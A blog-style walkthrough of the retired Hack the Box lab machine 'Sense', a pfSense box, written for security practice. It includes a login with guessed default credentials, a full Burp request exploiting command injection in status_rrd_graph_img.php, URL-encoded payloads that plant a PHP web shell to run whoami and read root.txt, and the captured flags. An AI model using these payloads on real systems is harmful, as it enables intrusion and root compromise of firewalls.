HTB: “Sense” Walkthrough

We’re back again for another Hack the Box retired machine walkthrough, this time we’re going to be doing Sense.

Ok so first things first lets scan the box with nmap and see what we ports we have open.

Starting Nmap 7.60 ( https://nmap.org ) at 2017–11–05 12:22 GMT
Nmap scan report for 10.10.10.60
Host is up (0.024s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https

So after running a dirbuster scan and finding a system-users.txt file

####Support ticket###
Please create the following user
username: Rohit
password: company defaults

Cool and after hitting it with the dirsearch scan I found a changelog.txt

# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required.

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window.

So lets do a quick google search for some pfsense default creds

Open a web browser and navigate to https://192.168.1.1/, using the default username admin and password pfsense to login.

Trying the default credentials didnt work, but remember that support ticket we saw earlier asking for the user Rohit to be created. We can use rohit and the password pfsense at the login page

Awesome and we’re in.

So after looking around and not really finding anything of use or that might be the next step we’re looking for . I think we should head over to google and see what we can find!!

https://www.proteansec.com/linux/pfsense-vulnerabilities-part-2-command-injection/

After reading through the blog post and trying the suggested vuln points I cam across one that seems to have worked.

status_rrd_graph_img.php

So switching to burp we can carry on with the blog post and that should allow us to create and read a file in the box.

GET /status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+”CMD+INJECT”>cmd.txt HTTP/1.1
Host: 10.10.10.60
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: cookie_test=1509963770; PHPSESSID=82378227b84a931c638f73c4481214c8
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Then browsing to the /cmd.txt file in the browser gives me this.

Perfect so we can see I have created a file on the box and we can see the contents. So now lets try using this more productively and try to get a shell out of it somehow!!

After trying to get a shell uploaded and failing. I realised I didnt actually need to have a shell on the box, we could do all we need to just with the web shell and sending cmds in one at a time. It’s not elegant but it will get the job done.

queues;cd+..;cd+..;cd+..;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+%22%3C?php%20system(%27whoami%27);?%3E%22%3Eandrew.php
(All the payloads are going through burp and being URL encoded so look a little wierd, if you want to see them decoded just paste them here)

Sending the above cmd we can see we are actually root on the webshell. Well this box just got ALOT easier :)

We should be able to inject some other cmds to see the contents of the file system and read both the user.txt and root.txt files. Let do it!

queues;cd+..;cd+..;cd+..;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+%22%3C?php%20system(%27cat%20root/root.txt%27);?%3E%22%3Eandrew.php

If we then navigate to the andrew.php page in the browser we can see the root flag text.

root
d08c32a4d7k8c8b27e76eb51a69f1a86

we can send the same cmd again but tweak it for rohit’s user.txt flag

user
8721327cc230937b40d27n0s17e7348b

I really liked this box, it was a little frustrating having to send the cmds in one at a time, but it was a good exercise in using burp to query the server instead of the usual path for these “easy” boxes that keep you in the browser/web shell etc.

Huge thanks to lkys37en for creating the box and to HTB for hosting it and for running such an amazing platform.

If you found this article helpful, please give it some 👏 and share it with anyone who you think might find it helpful too! + Feedback and coffees are always welcome! 😄

Take care and hopefully I’ll see you back here soon for more content and walkthroughs.